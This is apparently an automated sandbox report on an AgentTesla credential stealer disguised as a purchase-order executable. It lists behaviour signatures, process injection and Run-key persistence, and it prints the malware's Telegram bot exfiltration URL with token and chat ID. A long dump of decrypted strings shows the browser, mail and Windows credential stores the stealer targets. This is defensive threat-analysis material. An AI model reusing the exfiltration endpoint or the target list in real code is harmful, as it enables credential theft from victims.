Edit tour

Windows Analysis Report
PO54782322024.exe

Overview

General Information

Sample name:	PO54782322024.exe
Analysis ID:	1569681
MD5:	5dc11c53470282ca41404226ead4eccd
SHA1:	dc93ee506654c5fd14a6c0c851609e1d5aa7ac52
SHA256:	676869eec66690665e5a88c85636f738ad095b408973787420c3a1472b5bd482
Tags:	AgentTeslaexeuser-koluke
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected AntiVM3

Yara detected Telegram RAT

Yara detected UAC Bypass using CMSTP

.NET source code references suspicious native API functions

AI detected suspicious sample

Allocates memory in foreign processes

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Installs a global keyboard hook

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file does not import any functions

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

PO54782322024.exe (PID: 6844 cmdline: "C:\Users\user\Desktop\PO54782322024.exe" MD5: 5DC11C53470282CA41404226EAD4ECCD)

conhost.exe (PID: 6816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 2476 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

WerFault.exe (PID: 1740 cmdline: C:\Windows\system32\WerFault.exe -u -p 6844 -s 1068 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

AppPoint.exe (PID: 6048 cmdline: "C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

conhost.exe (PID: 1892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

AppPoint.exe (PID: 5012 cmdline: "C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

conhost.exe (PID: 5548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendMessage?chat_id=1376739206"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.4115057036.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000002.00000002.4116925393.0000000002AB7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.4116925393.0000000002AB7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1905674318.0000017F15F18000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000000.00000002.1905005575.0000017F05F4B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: PO54782322024.exe PID: 6844	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: PO54782322024.exe PID: 6844	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: RegSvcs.exe PID: 2476	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 2476	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegSvcs.exe PID: 2476	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
decrypted.memstr	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
decrypted.memstr	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
decrypted.memstr	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author
2.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.PO54782322024.exe.17f15f6db50.2.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.PO54782322024.exe.17f15f43b08.3.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.PO54782322024.exe.17f15f6db50.2.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security

Sigma Signatures

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 2476, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AppPoint

Suricata Signatures

ETPRO MALWARE Agent Tesla Telegram Exfil

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-06T05:51:00.581471+0100	2851779	1	Malware Command and Control Activity Detected	192.168.2.4	49732	149.154.167.220	443	TCP
2024-12-06T05:52:28.772328+0100	2851779	1	Malware Command and Control Activity Detected	192.168.2.4	49817	149.154.167.220	443	TCP

ETPRO MALWARE Agent Tesla Telegram Exfil M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-06T05:51:00.581471+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49732	149.154.167.220	443	TCP
2024-12-06T05:51:02.936121+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49734	149.154.167.220	443	TCP
2024-12-06T05:52:28.583138+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49818	149.154.167.220	443	TCP
2024-12-06T05:52:28.772328+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49817	149.154.167.220	443	TCP
2024-12-06T05:52:40.926692+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49849	149.154.167.220	443	TCP
2024-12-06T05:52:46.661125+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49861	149.154.167.220	443	TCP
2024-12-06T05:52:54.442325+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49882	149.154.167.220	443	TCP
2024-12-06T05:53:05.473843+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49909	149.154.167.220	443	TCP
2024-12-06T05:53:06.645593+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49915	149.154.167.220	443	TCP
2024-12-06T05:53:08.911100+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49921	149.154.167.220	443	TCP
2024-12-06T05:53:21.770591+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49948	149.154.167.220	443	TCP
2024-12-06T05:53:29.180396+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49968	149.154.167.220	443	TCP
2024-12-06T05:53:30.536070+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	49969	149.154.167.220	443	TCP
2024-12-06T05:53:42.317431+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	50000	149.154.167.220	443	TCP
2024-12-06T05:53:45.155874+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	50006	149.154.167.220	443	TCP
2024-12-06T05:54:13.020937+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	50028	149.154.167.220	443	TCP
2024-12-06T05:54:19.802464+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	50029	149.154.167.220	443	TCP
2024-12-06T05:54:24.505235+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	50030	149.154.167.220	443	TCP
2024-12-06T05:54:31.745983+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	50031	149.154.167.220	443	TCP
2024-12-06T05:54:34.114569+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	50032	149.154.167.220	443	TCP
2024-12-06T05:54:39.286315+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	50034	149.154.167.220	443	TCP
2024-12-06T05:54:55.304892+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	50035	149.154.167.220	443	TCP
2024-12-06T05:55:02.124151+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.4	50036	149.154.167.220	443	TCP

ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-06T05:51:00.831670+0100	2854281	1	A Network Trojan was detected	149.154.167.220	443	192.168.2.4	49732	TCP
2024-12-06T05:51:03.684238+0100	2854281	1	A Network Trojan was detected	149.154.167.220	443	192.168.2.4	49734	TCP
2024-12-06T05:52:29.005002+0100	2854281	1	A Network Trojan was detected	149.154.167.220	443	192.168.2.4	49817	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendMessage?chat_id=1376739206"}
Source: RegSvcs.exe.2476.2.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendMessage"}

Multi AV Scanner detection for submitted file

Source: PO54782322024.exe	ReversingLabs: Detection: 47%
Source: PO54782322024.exe	Virustotal: Detection: 48%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: PO54782322024.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: /log.tmp
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: text/html
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: text/html
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <br>[
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: yyyy-MM-dd HH:mm:ss
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: ]<br>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <br>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: text/html
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: application/zip
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Time:
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: MM/dd/yyyy HH:mm:ss
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <br>User Name:
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <br>Computer Name:
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <br>OSFullName:
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <br>CPU:
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <br>RAM:
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <br>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: IP Address:
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <br>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <hr>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: New
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: MM/dd/yyyy HH:mm:ss
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: IP Address:
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: true
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: https://api.ipify.org
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: true
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: true
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: true
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: false
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: true
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: false
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: https://api.telegram.org/bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: 1376739206
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: true
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: true
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: appdata
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: AppPoint
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: AppPoint.exe
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: AppPoint
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: true
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Type
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Software\Microsoft\Windows\CurrentVersion\Run
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <br>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <hr>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <br>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <b>[
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: ]</b> (
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: )<br>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: {BACK}
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: {ALT+TAB}
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: {ALT+F4}
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: {TAB}
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: {ESC}
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: {Win}
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: {CAPSLOCK}
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: {KEYUP}
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: {KEYDOWN}
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: {KEYLEFT}
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: {KEYRIGHT}
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: {DEL}
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: {END}
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: {HOME}
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: {Insert}
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: {NumLock}
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: {PageDown}
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: {PageUp}
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: {ENTER}
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: {F1}
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: {F2}
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: {F3}
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: {F4}
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: {F5}
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: {F6}
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: {F7}
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: {F8}
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: {F9}
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: {F10}
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: {F11}
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: {F12}
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: control
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: {CTRL}
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: &
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: >
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: "
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <br><hr>Copied Text: <br>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <hr>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: logins
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: IE/Edge
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Windows Secure Note
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Windows Web Password Credential
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Windows Credential Picker Protector
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Web Credentials
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Windows Credentials
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Windows Domain Certificate Credential
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Windows Domain Password Credential
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Windows Extended Credential
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: 00000000-0000-0000-0000-000000000000
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: SchemaId
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: pResourceElement
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: pIdentityElement
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: pPackageSid
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: pAuthenticatorElement
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: IE/Edge
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: UC Browser
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: UCBrowser\
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Login Data
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: journal
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: wow_logins
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Safari for Windows
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \Apple Computer\Preferences\keychain.plist
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <array>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <dict>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <string>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: </string>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <string>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: </string>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <data>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: </data>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: -convert xml1 -s -o "
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \fixed_keychain.xml"
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \Microsoft\Credentials\
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \Microsoft\Credentials\
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \Microsoft\Credentials\
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \Microsoft\Credentials\
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \Microsoft\Protect\
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: credential
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: QQ Browser
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Tencent\QQBrowser\User Data
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \Default\EncryptedStorage
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Profile
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \EncryptedStorage
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: entries
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: category
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Password
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: str3
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: str2
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: blob0
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: password_value
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: IncrediMail
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: PopPassword
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: SmtpPassword
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Software\IncrediMail\Identities\
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \Accounts_New
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: PopPassword
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: SmtpPassword
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: SmtpServer
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: EmailAddress
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Eudora
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Software\Qualcomm\Eudora\CommandLine\
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: current
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Settings
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: SavePasswordText
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Settings
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: ReturnAddress
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Falkon Browser
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \falkon\profiles\
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: profiles.ini
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: startProfile=([A-z0-9\/\.\"]+)
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: profiles.ini
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \browsedata.db
